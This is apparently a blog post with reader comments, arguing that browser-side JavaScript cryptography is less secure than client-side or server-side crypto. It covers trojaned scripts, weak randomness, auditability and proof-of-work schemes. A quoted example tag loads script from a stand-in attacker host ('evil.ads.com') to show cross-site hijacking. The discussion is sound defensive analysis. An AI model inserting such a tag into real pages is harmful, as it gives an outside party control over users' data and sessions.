Final post on Javascript crypto

The talk I gave last year on common crypto flaws still seems to generate comments. The majority of the discussion is by defenders of Javascript crypto. I made JS crypto a very minor part of the talk because I thought it would be obvious why it is a bad idea. Apparently, I was wrong to underestimate the grip it seems to have on web developers.

Rather than repeat the same rebuttals over and over, this is my final post on this subject. It ends with a challenge — if you have an application where Javascript crypto is more secure than traditional implementation approaches, post it in the comments. I’ll write a post citing you and explaining how you changed my mind. But since I expect this to be my last post on the matter, read this article carefully before posting.

To illustrate the problems with JS crypto, let’s use a simplified example application: a secure note-taker. The user writes notes to themselves that they can access from multiple computers. The notes will be encrypted by a random key, which is itself encrypted with a key derived from a passphrase. There are three implementation approaches we will consider: traditional client-side app, server-side app, and Javascript crypto. We will ignore attacks that are common to all three implementations (e.g., weak passphrase, client-side keylogger) and focus on their differences.

The traditional client-side approach offers the most security. For example, you could wrap PGP in a GUI with a notes field and store the encrypted files and key on the server. A client who is using the app is secure against future compromise of the server. However, they are still at risk of buggy or trojaned code each time they download the code. If they are concerned about this kind of attack, they can store a local copy and have a cryptographer audit it before using it.

The main advantage to this approach is that PGP has been around almost 20 years. It is well-tested and the GUI author is unlikely to make a mistake in interfacing with it (especially if using GPGME). The code is open-source and available for review.

If you don’t want to install client-side code, a less-secure approach is a server-side app accessed via a web browser. To take advantage of existing crypto code, we’ll use PGP again but the passphrase will be sent to it via HTTP and SSL. The server-side code en/decrypts the notes using GPGME and pipes the results to the user.

Compared to client-side code, there are a number of obvious weaknesses. The passphrase can be grabbed from the memory of the webserver process each time it is entered. The PGP code can be trojaned, possibly in a subtle way. The server’s /dev/urandom can be biased, weakening any keys generated there.

The most important difference from a client-side attack is that it takes effect immediately. An attacker who trojans a client app has to wait until users download and start using it. They can copy the ciphertext from the server, but it isn’t accessible until someone runs their trojan, exposing their passphrase or key. However, a server-side trojan takes effect immediately and all users who access their notes during this time period are compromised.

Another difference is that the password is exposed to a longer chain of software. With a client-side app, the passphrase is entered into the GUI app and passed over local IPC to PGP. It can be wiped from RAM after use, protected from being swapped to disk via mlock(), and generally remains under the user’s control. With the server-side app, it is entered into a web browser (which can cache it), sent over HTTPS (which involves trusting hundreds of CAs and a complex software stack), hits a webserver, and is finally passed over local IPC to PGP. A compromise of any component of that chain exposes the password.

The last difference is that the user cannot audit the server to see if an attack has occurred. With client-side code, the user can take charge of change management, refusing to update to new code until it can be audited. With a transport-level attack (e.g., sslstrip), there is nothing to audit after the fact.

The final implementation approach is Javascript crypto. The trust model is similar to server-side crypto except the code executes in the user’s browser instead of on the server. For our note-taker app, the browser would receive a JS crypto library over HTTPS. The first time it is used, it generates the user’s encryption key and encrypts it with the passphrase (say, derived via PBKDF2). This encrypted key is persisted on the server. The notes files are en/decrypted by the JS code before being sent to the server.

Javascript crypto has all the same disadvantages as server-side crypto, plus more. A slightly modified version of all the server-side attacks still works. Instead of trojaning the server app, an attacker can trojan the JS that is sent to the user. Any changes to the code immediately take effect for all active users. There’s the same long chain of software having access to critical data (JS code and the password processed by it).

So what additional problems make JS crypto worse than the server-side approach?

  1. Numerous libraries not maintained by cryptographers — With a little searching, I found: clipperz, etherhack, Titaniumcore, Dojo, crypto-js, jsSHA, jscryptolib, pidCrypt, van Everdingen’s library, and Movable Type’s AES. All not written or maintained by cryptographers. One exception is Stanford SJCL, although that was written by grad students 6 months ago so it’s too soon to tell how actively tested/maintained it will be.
  2. New code has not been properly reviewed and no clear “best practices” for implementers — oldest library I can find is 2 years old. Major platform-level questions still need to be resolved by even the better ones.
  3. Low-level primitives only — grab bag of AES, Serpent, RC4, and Caesar ciphers (yes, in same library). No high-level operations like GPGME. Now everyone can (and has to) be a crypto protocol designer.
  4. Browser is low-assurance environment — same-origin policy is not a replacement for ACLs, privilege separation, memory protection, mlock(), etc. JS DOM allows arbitrary eval on each element and language allows rebinding most operations (too much flexibility for crypto).
  5. Poor crypto support — JS has no secure PRNG such as /dev/urandom, side channel resistance is much more difficult if not impossible
  6. Too many platforms — IE, Firefox, Netscape, Opera, WebKit, Konqueror, and all versions of each. Crypto code tends to fail catastrophically in the face of platform bugs.
  7. Auditability — each user is served a potentially differing copy of the code. Old code may be running due to browser cache issues. Impossible for server maintainers to audit clients.

JS crypto is not even better for client-side auditability. Since JS is quite lenient in allowing page elements to rebind DOM nodes, even “View Source” does not reveal the actual code running in the browser. You’re only as secure as the worst script run from a given page or any other pages it allows via document.domain.

I have only heard of one application of JS crypto that made sense, but it wasn’t from a security perspective. A web firm processes credit card numbers. For cost reasons, they wanted to avoid PCI audits of their webservers, but PCI required any server that handled plaintext credit card numbers to be audited. So, their webservers send a JS crypto app to the browser client to encrypt the credit card number with an RSA public key. The corresponding private key is accessible only to the backend database. So based on the wording of PCI, only the database server requires an audit.

Of course, this is a ludicrous argument from a security perspective. The webserver is a critical part of the chain of trust in protecting the credit card numbers. There are many subtle ways to trojan RSA encryption code to disclose the plaintext. To detect trojans, the web firm has a client machine that repeatedly downloads and checksums the JS code from each webserver. But an attacker can serve the original JS to that machine while sending trojaned code to other users.

While I agree this is a clever way to avoid PCI audits, it does not increase actual security in any way. It is still subject to the above drawbacks of JS crypto.

If you’ve read this article and still think JS crypto has security advantages over server-side crypto for some particular application, describe it in a comment below. But the burden of proof is on you to explain why the above list of drawbacks is addressed or not relevant to your system. Until then, I am certain JS crypto does not make security sense.

Just because something can be done doesn’t mean it should be.

Epilogue

Auditability of client-side Javascript

I had overstated the auditability of JS in the browser environment by saying the code was accessible via “View Source”. It turns out the browser environment is even more malleable than I first thought. There is no user-accessible menu that tells what code is actually executing on a given page since DOM events can cause rebinding of page elements, including your crypto code. Thanks to Thomas Ptacek for pointing this out. I updated the corresponding paragraph above.

JS libraries such as jQuery, Prototype, and YUI all have APIs for loading additional page elements, which can be HTML or JS. These elements can rebind DOM nodes, meaning each AJAX query can result in the code of a page changing, not just the data displayed. The APIs don’t make a special effort to filter out page elements, and instead trust that you know what you’re doing.

The same origin policy is the only protection against this modification. However, this policy is applied at the page level, not script level. So if any script on a given page sets document.domain to a “safe” value like “example.net”, this would still allow JS code served from “ads.example.net” to override your crypto code on “www.example.net”. Your page is only as secure as the worst script loaded from it.

Brendan Eich made an informative comment on how document.domain is not the worst issue, separation of privileges for cross-site scripts is:

Scripts can be sourced cross-site, so you could get jacked without document.domain entering the picture just by <script src=”evil.ads.com”>. This threat is real but it is independent of document.domain and it doesn’t make document.domain more hazardous. It does not matter where the scripts come from. They need not come from ads.example.net — if http://www.example.net HTML loads them, they’re #include’d into http://www.example.net’s origin (whether it has been modified by document.domain or not).

In other words, if you have communicating pages that set document.domain to join a common superdomain, they have to be as careful with cross-site scripts as a single page loaded from that superdomain would. This suggests that document.domain is not the problem — cross-site scripts having full rights is the problem. See my W2SP 2009 slides.

“Proof of work” systems

Daniel Franke suggested one potentially-useful application for JS crypto: “proof of work” systems. These systems require the client to compute some difficult function to increase the effort required to send spam, cause denial of service, or bruteforce passwords. While I agree this application would not be subject to the security flaws listed in this article, it would have other problems.

Javascript is many times slower than native code and much worse for crypto functions than general computation. This means the advantage an attacker has in creating a native C plus GPU execution environment will likely far outstrip any slowness legitimate users will accept. If the performance ratio between attacker and legitimate users is too great, Javascript can’t be used for this purpose.

He recognized this problem and also suggested two ways to address it: increase the difficulty of the work function only when an attack is going on or only for guesses with weak passphrases. The problem with the first is that an attacker can scale up their guessing rate until the server slows down and then stay just below that threshold. Additionally, she can parallelize guesses for multiple users, depending on what the server uses for rate-limiting. One problem with the second is that it adds a round-trip where the server has to see the length of the attacker’s guess before selecting a difficulty for the proof-of-work function. In general, it’s better to select a one-size-fits-all parameter than to try to dynamically scale.

Browser plugin can checksum JS crypto code

This idea helps my argument, not hurts it. If you can deploy a custom plugin to clients, why not run the crypto there? If it can access the host environment, it has a real PRNG, crypto library (Mozilla NSS or Microsoft CryptoAPI), etc. Because of Javascript’s dynamism, no one knows a secure way to verify signatures on all page elements and DOM updates, so a checksumming plugin would not live up to its promise.

Scripts can be sourced cross-site, so you could get jacked without document.domain entering the picture just by <script src=”evil.ads.com”></script>. This threat is real but it is independent of document.domain and it doesn’t make document.domain more hazardous. It does not matter where the scripts come from. They need not come from ads.example.net — if http://www.example.net HTML loads them, they’re #include’d into http://www.example.net‘s origin (whether it has been modifeid by document.domain or not).

In other words, if you have communicating pages that set document.domain to join a common superdomain, they have to be as careful with cross-site scripts as a single page loaded from that superdomain would.

This suggests that document.domain is not the problem — cross-site scripts having full rights is the problem. See my W2SP 2009 slides.

132 thoughts on “Final post on Javascript crypto

  1. Hello,

    Of course, I don’t disagree with your statement. You’re summarizing the situation very well! (I’m going to tweet about your post: http://twitter.com/mruef)

    But there is one thing I don’t like. You write:

    The one thing JS crypto is potentially better at is client-side auditability. Yes, you can “View Source” every time you use the web app (…) since no one does this, the point is moot.

    Wouldn’t there be a technical solution for this (checksums)? And why do you expect someone’s not checking the sites source code but you assume all the other security and audit measurements (althought they might be economical insufficient)?

    Regards,

    Marc

  2. I can think of one legitimate use for JS crypto, and it’s the one thing I’ve never actually seen it used for: cryptographic proof-of-work as mitigation against online dictionary attacks.

    There are two usual ways to prevent online dictionary attacks: CAPTCHAs, and lockout after N incorrect tries. AIs are getting better and better at breaking CAPTCHAs, and lockout, even if temporary, is inherently a DoS vulnerability.

    However, you can use JS to submit a cryptographic proof of work along with every login attempt. During attacks, the server can dynamically scale the amount of required work in proportion to how quickly attempts are being made. That way, rather than a hard lockout, the worst that can happen is that legitimate users have to wait a while before logging in — and things go back to normal as soon as the attack is over.

    The downside here is that users have to compute their PoW in JS, while attackers get to use C and CUDA. But at least this gap is getting narrower as JS interpreters improve, and the math works out pretty well already. If an adversary has 1000x the computational resources as the user under attack, and that user’s password is 6 random lower-case letters, and the server forces the user to spend 1 minute computing PoW, then that password can be expected to hold out for almost a year. By which time a server admin will hopefully have intervened to shut down the attack.

    One cute optimization would be to require less work when submitting a strong password than when submitting a weak one. A user with a random 20-character password doesn’t have to worry about dictionary attacks anyway, so why make him wait to log in just because some schmuck is trying to break into Fort Knox by beating his head against the front door?

    1. I’ve thought about Javascript proof-of-work protocols before, but I’ve had trouble finding anything that actually works. In particular, classical cryptographic code – with its heavy reliance on uint32’s and everything that implies – tends to run painfully slowly. Something like Dwork, Goldberg and Naor’s “On Memory-Bound Functions for Fighting Spam” seems a better idea (JS may be computationally slow, but if the memory overhead is modest it should be able to keep up with C on memory-bound functions – at least before you consider multicore, NUMA and other such niceties) but requires a rather large amount of data. One could try to generate this data client-side with a PRG, but then you need to be sure that one cannot efficiently “seek” in the output of the PRG even when the key is known…

      1. Adding to my own comment: there are actual Javascript proof of work systems. They are either based on obfuscation of the Javascript or run ridiculously slowly (so slowly that a C program on a typical home computer would be constrained by bandwidth before CPU time, I’d guess).

    2. He recognized this problem and also suggested two ways to address it: increase the difficulty of the work function only when an attack is going on or only for users with weak passphrases. The problem with the first is that an attacker can scale up their guessing rate until the server slows down and then stay just below that threshold. Additionally, she can open many parallel connections and split guesses among them. The problem with the second is that an attacker can walk through the username list, looking for the hardest work function. That user has the weakest password and should be targeted first.

      I think you misunderstood me slightly per both these suggestions. Threshold calculation should be per account, not per connection, so parallel connections don’t buy you anything. And the amount of work required to submit a login attempt should be based on the strength of the guessed password, not the strength of the correct one, so there’s no information leak there.

      1. [For clarity: the text quoted in the comment I’m replying to has been added to the article.]

        Yes, that makes sense and sufficiently addresses the objections raised in the (edited) article.

        There are still two issues, though: I don’t know of any function which can be evaluated fast enough in Javascript (but maybe one could be found), and there are “economic” arguments against proof-of-work schemes, e.g. http://www.cl.cam.ac.uk/~rnc1/proofwork.pdf.

        Still, your proposal is at least as sensible as mine…

      2. re: parallel connections: I meant that whatever resource the server rate-limits on should be parallelized by the attacker. If it’s connections, multiple connections. If users, guess multiple user account passwords in parallel. You typically have many users to choose from and only need one success.

        re: delay based on guessed password strength: It wasn’t clear you were saying this. It still doesn’t look like that would work because the server would have to see the password guess first, then send a corresponding strength proof-of-work code to the client to resubmit. This adds round trips to the protocol.

      3. [In response to Nate:]

        Non-interactive proof-of-work protocols are doable. Calculate some form of complexity (say length * log(smallest reasonable class containing all password characters)) and require an N-byte string s such that SHA1(s || url of form || input to form || timestamp) starts with ( minus ) zeroes – this is what hashcash does. Increase the number of zeroes you require when there are too many logins for a given account. This can be done interactively: the server accepts the first proof of work, and rejects the next with “try again, for x more zeroes this time” (this can be transparent to the user).

        Even if your amount of work requested is hard to “scale” in this fashion, telling the client to “try again” is not that unreasonable – provided there’s an upper limit to the amount of additional work required, no client can ever be completely locked out of an account, and “try again” message should only appear when under attack.

        I agree that slowing down logins for all users may be necessary (e.g. when a sufficient number of failed login attempts are registered at different accounts.) This is undesirable, but acceptable.

      4. Joachim, that seems reasonable, as long as your timestamp is unique (e.g., is not month/year, cannot be reset back to a previous time, timestamps in the future are not accepted, etc.) Otherwise the attacker can replay.

        Since it is non-interactive, an attacker can pre-calculate a whole batch of these before beginning the attack. It is critical that “input to form” include the username as well as password guess, that way the proof-of-work is bound to that one account only.

  3. To address your list of problems wrt to this use case: 4 through 7 don’t matter, because the JS crypto code isn’t handling any secrets. 1 through 3 still apply, but you’re reversing cause and effect. It’s not that JS crypto is bad because there are no good implementations. It’s that there are no good implementations because anyone smart enough to write one is smart enough to know that it’s a bad idea to begin with. As soon as a use case comes along to make it worthwhile, someone will solve the implementation problem, and it only has to be solved once.

  4. This is a straw-man argument. In your example of the secure note-taker, adding JS crypto clearly doesn’t add anything but complexity. But it’s a long way to go from there to the idea that crypto in JS could never be useful.

    At the very least, there are lots of uses of JS outside the traditional server/browser model. These include node.js, browser extensions, bookmarklets, downloadable HTML/JS apps, database query languages, and so on. Javascript is a general-purpose language these days; you can’t just dismiss JS crypto on the basis of quirks in the security model of one application.

    More generally, your argument seems to be that because the trust of JS crypto ultimately derives from the source of the JS (ie, the server), encrypting something client-side and sending it back to the server doesn’t add very much. But that’s not the only thing that the browser can do with encrypted data. Data can be persisted to disk, either as cookies or stored in an HTML5 DB; data can be passed to 3rd party servers using XMLHttpRequests or WebSockets; data can be deserialized and decrypted from a JSONP callback; and so on.

    As to the quality of available libraries — I agree that the best projects are still pretty young. But it’s worth pointing out that Google’s Closure library (the JS behind Gmail, Reader, Google Maps, etc) contains a couple crypto primitives… I have no idea what they’re used for in practice, but that code base is certainly one of the best-maintained and best-reviewed (by Google employees at least) Javascript code bases anywhere.

    Anyway; just making the counter-argument. I certainly agree with your basic point that it’s easy to get JS crypto wrong — or even that *most* uses are wrong. But that doesn’t mean that good uses are impossible to imagine.

    -sq

      1. you can run node.js in the client. the line between client and server is very, very murky and getting murkier all the time. people are running browser (client) engines on servers. if aren’t careful you’ll miss this transition. i’m personally aware of a project at a certain internet giant whose whose aim is to change the way internet works – specifically with respect to the arbitrary line between code and data. the solution of securely moving code around the internet, which huge government grid computing projects have been working on for decades, it right in front of our eyes.

    1. This article is clearly about client-side browser JS, its environment, and trust model. It is not a complaint about the core language itself or an alternate environment like Node.js. That being said, some of the environments you describe (bookmarklets) suffer from the same flaws described in points 1-7.

      All of the things you describe that can be done with the data (local storage, posted via XML-RPC) do not address the arguments made in points 1-7. The root of trust is the server because the JS code is downloaded from there. What it does with the data after en/decrypting it makes no difference to this fact.

  5. The other place it makes sense to use JS crypto is opportunistically where it would not otherwise be used. SSL provides the “right” way to encrypt logins for large websites, but there is a great deal of code deployed on the web that will never use SSL for a variety of reasons, inexperience of the webmasters being the prime reason. WordPress is a good example. If javascript can be used to improve security of those applications by hashing the login information so that it is not vulnerable to simple sniffing, the overall security of the web is improved.

    1. Similarly, the staircase in my living room is failing badly, and the contractor told me it will cost many thousands of dollars to completely rebuild (since the original was build badly). Therefore, I am going to repaint.

      There are rare cases where “a little better than awful” is as reasonable an answer as “correct”, but those cases almost never involve user safety. Javascript isn’t improving the security of applications where it’s used to hash login information that isn’t being sent over SSL; it’s simply making the exploit more fun to write. In this case: without SSL delivery of the login page, there’s no way to prevent an attacker from simply inserting a script tag into the DOM that spirits away login information. What was the point?

      1. actually, i think an honest look at the security/privacy mechanisms provided by today’s tools *precisely* describes a case where ‘a little better than awful’ would be preferred. my mother emailed me some bank account information just last week. there isn’t *any* exploit required there. security software experts have failed horribly to provide tools that actual living breathing human beings might use and this is why most of them have just given up and use hotmail.

        i personally find it astounding that the kind of people who will deny this probably have an actual brand new credit card sitting in their unlocked mailbox and feel perfectly comfortable with this fact.

        your information’s security is only as strong as it’s weakest link. this includes the locks on your home, your mailbox, and the granularity you shred your trash with.

    1. If your users install have to install a plugin anyway, why not do the crypto in the plugin? (No, “this could be reused for other sites” is not an argument – a) it won’t be, and b) so can my “crypto plugin”.)

    2. Cortesi’s concept is silly. It seeks to find — through trial and inevitable error — the bare minimum kernel of functionality a browser needs to bolt on to make it theoretically possible to safely deploy crypto in a browser. Whether or not he eventually identifies that functionality, he hasn’t addressed any of the problems that make it hard to get cryptography right in a browser. Cryptography is hard enough in native clientside code. The minimum viable crypto kernel required to implement it in a harder environment just isn’t valuable.

      If clientside browser crypto was valuable (and maybe it is), why wouldn’t we just standardize on PGP and provide standard JS bindings to a native browser PGP module? PGP works.

      1. I like this. If there was a standard JS wrapper around PGP with your keyring stored securely in local storage, I would support use of JS crypto. Not until then.

      2. Or at least expose through a js binding a subset of their native crypto libs. For instance looking at how they currently implement bookmarks synchronization, both chrome and firefox currently use native crypto primitives, while everything is done in c++ in chrome, firefox has developped an extension that binds NSS primitives and is called from their js extension’s code.

      3. That’s an interesting idea.

        Of course, my browser – the most insecure piece of software I run – will have to pry access to my PGP key from my cold, dead hands. *Especially* if it’s accessible from Javascript. How long before Mozilla or Microsoft does something stupid and allows anyone to sign any document with my key, or just discloses it completely?

      4. Seb, while I like the idea of JS having native bindings (e.g. to Mozilla NSS), I think those libraries are too low-level and something with the application-level behavior of PGP is more desirable.

  6. I have 3 comments/ideas about your post:

    1. I think their is/used to be a checksum-support in HTTP (Content-MD5 – yes, yes, I know md5 is broken, it’s just an example), if the browser supported it (I don’t think their is one that does at the moment) and their was a GUI which I can use to verify that the source-code I downloaded is the same as last time (or something like that). Then it might be useful.

    2. I’ve ones build an application where I wanted cryptography in a web-browser. It was a chat application, where messages pass from browser to server to the browser of the person I wanted to have a conversation with. The crypto was their to garantee privacy. I wanted to create a chat application which could establish a real secure connection between 2 people which was guaranteed to be private. Obviously you can’t have it rely on the server to do the crypto. It used Diffie Hellman key exchange so that both sides could establish the same private key.

    I never finished it because I’ve never figured out how I could be 100% certain who I was talking to. And I knew that I don’t know good crypto (it was a learning experience/project about crypto) and browsers don’t have a good random-number generator.

    3. A different way crypto in the browser instead of an API could be to have a crypto enabled textarea’s, with some extra GUI-elements to help it along. A simple application could be in webmail, where the browser would sign or encrypt your message before you send the message to the server. The browser can do all the normal garantees any other normal fat-client does and not let any javascript get to the cleartext.

    PS English is not my first language.

    1. 1. Even if that actually worked, users have no way of distinguishing a legit version bump from a trojan. Read up on “malicious cryptography” for some examples. Also, MD5 is insecure.

      2. Your gut reaction is correct. Your system effectively would have been relying on the “server to do the crypto”, just with delayed execution in the browser environment. You’re right there is no secure PRNG available.

      3. Key management would still be hard (establishing identity).

  7. Good article, and I basically agree with your conclusions about Javascript crypto, at least in web browsers.

    However, you say that “With client-side code, the user can take charge of change management, refusing to update to new code until it can be audited.”

    That hypothetical advantage of client-side code is not true in practice. Most client-side operating systems run code with the full privileges of its invoking user, allowing any app (or code that it runs or is exploited by) to interfere with any other app. And many applications have automatic update mechanisms that don’t really leave the user in control, or able to audit the code that they are running (or to rely on someone else’s audit and know that they are running the same code).

  8. Maybe I should add, crypto in the browser (other then for transport encryption) can be useful where your data was already encrypted, the webserver only handles encrypted data and the user has the key.

    For example, I’ve seen a remote backup-service where a fat-client encrypts the data and uploads it to the server. When you need to retrieve a file, a user could login with a browser and download an encrypted file which had the file-list. In the ‘browser’ they decoded the list asked the user what file or file-part the user wanted to retrieve and asked the server for that part.

    The most obvious flaw in their implementation was they used a Java-applet, nice try, but we don’t know where the data goes after it was decrypted so that was useless.

    But if the browser had the properly checked crypto library built in and the right GUI and no made it so the code in the page doesn’t get access to the plaintext or keys (and we keep pages/domains seperate in different processes like in Chrome, etc. etc. :-) ) then we could actually build these things proper.

    1. The “proper” way to build a secure backup system with a requirement that the server never be able to read the client’s content is for the client’s browser to entirely trust that the server and the channel between the server and the client is delivering safe encryption code?

      1. Sorry, but I don’t think I understand what you said.

        The idea was to have the server just hold encrypted data.

        When the user wants to retrieve a file, the browser would ask the server for the file and decode it with a user specified key.

      2. “Yes, but where does the browser get the code that implements the decryption process? That’s my main point about trusting the server.”

        Nate, it should just use standard encryption methods which are included in the browser. Javascript just gets the encrypted data from the server. And the browser should have a GUI which can be used to ask the user for the key to decrypt the data.

        I think decoding a message could be done with a special textarea and handling files could be done by adapting the HTML5 file API: http://www.thebuzzmedia.com/html5-drag-and-drop-and-file-api-tutorial/

        In this case Javascript is just glue handling encrypted data which came from the server.

      3. Lennnie: What should just use standard encryption methods which are included in the browser? (Most browsers don’t include JS-accessible crypto libraries, but that might change if someone found a use for them.)

    2. Hi Joachim,

      Simplest example would be PGP for webmail.

      Let’s say you use for example gmail, people do and will keep doing so for some strange reason. It looks like it might even be increasing, moving their stuff ‘into the cloud’. So you have a need to use PGP to sign or encrypt your messages when communicating with some people. How would you do this ?

      It looks like their is already an extension call FireGPG for that (never tried it), but would it not be better to have it in the browser so it works with any webmail or other messaging system and the code is checked by people who understand encryption ?

      1. That might be marginally useful, yes. Of course, doing it server-side a la hushmail has quite a few advantages (e.g. in usability), and if you want to do it properly you’ll need a local mail client anyway…

      2. “if you want to do it properly you’ll need a local mail client anyway”

        OK, I’ll bite. Why ? Because you have 2 browsers, both have PGP-keys and can send PGP-encrypted messages to each other, through the email-system (in this case with the use of webmail).

        If you say, well the javascript-code in the page could send your encrypted message to someone else as well or could let someone else know those 2 persons are communicating.

        So does the current email-system.

        I’d love to know how a mail client is safer.

      3. I’ll admit: assuming the browser is as secure as your local mail client (probably not true even if you’re using Outlook), this may not be worse, security-wise, than a local mail client. That said, if you want to do Javascript crypto you’ll be in trouble:

        If Javascript can be used to make signatures or decrypt messages, you need to trust your webmail provider not to fake messages on your behalf or read your mail. If Javascript can be used to verify signatures or encrypt messages, you have an information leak (so, you, an employee of the DoD, have Assange’s key, eh? Interesting…). If Javascript can read the textarea on which you want to apply encryption, your webmail provider can read your plaintext.

        In fact, you don’t want to use a textarea at all, as people will have difficulty telling a non-Javascript-accessible textarea from a normal one (you can put an icon in the browser chrome to signal “you’re typing into a secure textarea” – but people won’t check that, and there’s lots of things that can go wrong.) Obviously, either an alternative to a textarea or a non-JS-accessible textarea breaks rich text editors, on-page spellcheckers etc.

        So you need to add extra dialogs (“encrypt, sign and paste the following text”), and essentially prohibit Javascript from interacting with your plugin at all. Once you’ve done this, you’ve built a clientside native application that’s rather badly integrated into your browser – which is probably the most insecure piece of software on your system, not a good place to store your keys!

        This could work. But by the time you’ve done all of the above, there’s no Javascript in your crypto anymore, and I don’t really see any advantage over a native mail client either.

      4. Joachim, I think it shouldn’t be a plugin. That’s my point. If their is a HTML5 standard (or whatever) which the browser supports. It would gives much more possibilities.

        Chromium, Firefox, Webkit are all open source, they can be properly checked by people who know crypto. Thus making it as secure as SSL is now (you could argue that the multi-CA-model isn’t secure to begin with and we need DNSSEC to solve it, but that is a whole different problem).

        And you can use it not just for mail, but many other things.

        For example, I’m pretty sure Google Chrome OS won’t come with a seperate mailclient. Maybe PGP users are not their target audience, but still, why shouldn’t they be ?

      5. I don’t see how any of the issues I pointed out would be solved by building this into the browser. I wasn’t arguing that you shouldn’t implement PGP in on-page Javascript (although you shouldn’t); I was arguing that allowing Javascript to interact with this functionality, no matter how the functionality is implemented, is a bad idea. And that any in-browser implementation would be clunky or insecure or both.

  9. @David-Sarah you can’t mess with a web application from other apps, unless you install a browser add-on that does that. As far as “the outside” (system) goes, browsers are pretty secure. I think the danger is on the net itself.

    To avoid someone tampering with your scripts, you could serve checksum code from a separate server with hardened security (no need for a full web server stack on it). You’d have to hack both to do anything.

    1. I think there is some confusion about my comment, which applies to all client-side code that is run with the privileges of the invoking user: web browsers, other client-side applications, document macros, etc. Web scripts would not be in that category if, for the sake of argument, browsers were bug-free.

      However, I’m genuinely astonished that anyone would claim that web browsers are “pretty secure”. (No, I’m not just feigning astonishment for rhetorical effect.)

      Re: “you can’t mess with a web application from other [web] apps”. Yes you can, if you can find an injection or XSRF vulnerability in the site (thereby bypassing the same-origin restrictions), or any vulnerability in the browser or any of its plug-ins. That’s far too large an attack surface for the assumption that there are no such vulnerabilities to be reasonable.

      1. I forgot to mention “or if the web app is served by an insecure protocol; or if it is served by HTTPS and (the user clicks past the cert warning that they have been systematically trained to click past, or any root CA is compromised)”.

      2. do you regularly audit the code your system installed when it prompts to you upgrade? do you check the dlls it downloads? do you make sure DNS isn’t compromised before accepting?

        it’s absolutely crazy to me that people think running code in the browser from a server is somehow fundamentally different than running code from the internet in general, including system and third party software upgrades.

        i’m speaking of the general case here – my mother will click ‘yes, install latest version’ no matter what pops up on her screen. unless you have some magic system that let’s people run software without installing components from the internet then please don’t suggest that only the browser and javascript are subject to this problem – pretty much every piece of software on every operation system has this same vulnerability.

        check the gnu-pgp security updates log if you doubt this. then consider how you audit the versions of all the people you share secrets with who use this system.

        hint: you don’t.

      3. Did you actually read the post you’re commenting on? It was carefully arranged as a progression from server-side to client-side Javascript crypto. Server-side is the same trust model as client-side. However, there are other problems with client-side crypto (points 1-7).

        Why take on additional problems for no gain in the basic trust model? Answer: because JS crypto is about misleading your users or even yourself into thinking it adds something.

  10. Thanks for all the comments. Instead of saying the same thing multiple times, I have updated the post’s Epilogue section with comments on three points:

    * Auditability of client-side Javascript
    * “Proof of work” systems
    * Browser plugin can checksum JS crypto code

  11. A little offtopic but since it was mentioned: does anyone know how to use sslstrip to sniff your own traffic? I tried using an http proxy on localhost but the remote ssl hosts keep sending back “bad request”. HTTP works fine. Presumably I’m missing something obvious.

  12. I took your post as a challenge to come up with something. It is, of course, horribly wrong and only marginally useful; but I think it’s not, theoretically, broken (that is, I’ll assume, for the sake of discussion, that client-side JS crypto libraries are free of stupidities and we don’t need to worry about side-channel attacks.) WARNING WARNING WARNING: the scheme below is off the top of my head and may be horribly broken. Recall, “It’s got crypto in it. Everyone always fucks it up.”.

    With the above disclaimer: Javascript in the browser can be used to do a peculiar kind of (“single-“)sign on across trust domains with one less round trip.

    Here’s a scenario to justify the threat model. Let’s presume we have a “daily lolcat” site: create an account with an e-mail and password, we send you a lolcat daily with an upsell to get the image on a mouse pad. Once a week, we order mats in bulk and ship them. The “daily lolcat” web server only hosts a sign-up form, tons of lolcats, and some extremely poorly-written software that combines a mailing list archive with some links to an external store (“get yesterday’s lolcat on a mousepad / on a coffee mug / …”); we’ve outsourced the actual mailing list and the store. Really, the site doesn’t need usernames (e-mail accounts) at all, but we want our users to subscribe to our mailing list before we show them the lolcats. (Recall, we buy in bulk and ship immediately – without being able to sell “back issues”, our website doesn’t make us much money. Our mailing list does.) The site doesn’t actually need passwords at all, either – but we’ve found that doing away with passwords leads to lot of scared-and-confused customers, which is bad for business. Still, the “daily lolcat” site is probably full of security holes (which we can’t all fix – the boss won’t let us spend that much time on it, and PHP makes our eyes bleed anyway), and it would be bad for business if users’ passwords were compromised (because they’ve inevitably reused them everywhere).

    In short, we require security of our users’ passwords even if the low-trust (“lolcat”) server is compromised. Note that just hashing the users’ passwords isn’t good enough: even if we use something sane like PBKDF2, their passwords are disastrously weak; even worse, an attacker could obtain plaintext passwords of anyone who logged in while the server was compromised.

    So, we install a second, trusted (“actually secure”), server which hosts nothing but a HTTPS login form. This form includes some Javascript (and fails whenever Javascript is disabled) and contains E(PH(password), c), where E is encryption, PH() is a key derivation function like PBKDF2, and c is a random challenge. As soon as the form is sent to the browser, the secure server sends a public-key signature sign(sk, c) to the low-trust server (over a secure channel – they’re in the same data center and we run a cable between them, or somesuch). The web browser decrypts E(PH(password), c) using the password entered by the user and submits the result to the low-trust server, which accepts this if and only if sign(sk, c) is a valid signature on the submitted data.

    Now, a compromise of the low-trust server is rather harmless: it doesn’t ever process any interesting data, not even hashes of our users’ passwords, and it doesn’t store any interesting data. (Of course, this “harmless” presumes that users’ browsers are secure. But we can dream).

    We could, of course, make our users submit the form to our secure host and then send them over to the low-trust server with sign(sk, username) in a cookie or in the URL, but that would require an additional round trip. I’d say having to deal with Javascript crypto is worse, but I could imagine doing it if that extra round trip gave too many users enough time to realize that their lives are not so meaningless that a lolcat mouse pad would not degrade it further.

    1. Funny description, but I don’t see how this requires JS crypto. Replace all the signatures, etc. with a simple cookie.

      Assuming the submitted password is correct, the secure login server sends a cookie to the client browser as part of the response to the form submit. It also sends the cookie to the insecure server via the shared link. The browser then sends this cookie to the insecure server with all subsequent requests. The insecure server checks for a match against its local copy of the cookie.

      This is just basic single-sign on behavior today. How is this more round trips?

      If you’re saying the secure server in your protocol doesn’t validate the password, there’s a serious security problem. You’ve just handed any pre-auth attacker a hash of the user’s password, which will allow them to crack in parallel offline. This is much worse than a potential compromise of hashes stored on the insecure server since you now have a guaranteed compromise of hashes to anyone on the Internet.

      In particular, an attacker can observe a single E() token and valid “c” response for it and then do a fully offline attack at guessing passwords. Or, they can contact the server to retrieve an E() token and then do a partially offline attack of deriving “c” values from password guesses. The resulting “c” values can be queued up and then sent to the insecure server to check validity.

      In the latter case, the insecure server could attempt to rate-limit requests for users with bad “c” values. However, it would not require any further contact with the login server, which would presumably be where you want to enforce account integrity.

      Neither of these attacks works in a traditional SSO model. You can attempt to guess cookies, but they are not related in any way to the user’s password.

